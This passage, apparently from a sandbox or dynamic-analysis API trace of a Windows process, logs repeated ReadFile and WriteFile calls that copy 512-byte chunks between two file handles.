lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.201] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.201] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.202] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.202] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.203] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.203] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.204] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.204] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.205] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.205] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.206] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.206] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.207] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.207] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.208] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.208] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.209] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.209] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.210] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.210] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.211] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.211] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.212] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.212] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.213] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.213] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.214] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.214] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.215] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.215] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.216] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.216] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.217] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.217] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.218] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.218] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.218] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.219] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.220] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.220] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.220] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.221] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.221] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.222] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.222] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.223] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.223] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.224] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.224] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.225] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.225] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.226] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.226] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.227] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.227] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.228] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.228] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.229] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.230] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.230] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.230] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.231] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.231] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.232] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.232] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.233] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.233] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.234] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.234] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.235] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.235] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.236] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.236] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.237] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.237] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.238] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.238] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.239] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.239] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.240] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.240] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.241] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.241] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.242] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.242] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.243] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.243] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.244] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.245] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.245] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.245] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.246] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.246] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.247] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.247] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.248] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.248] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.249] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.249] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.250] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.250] 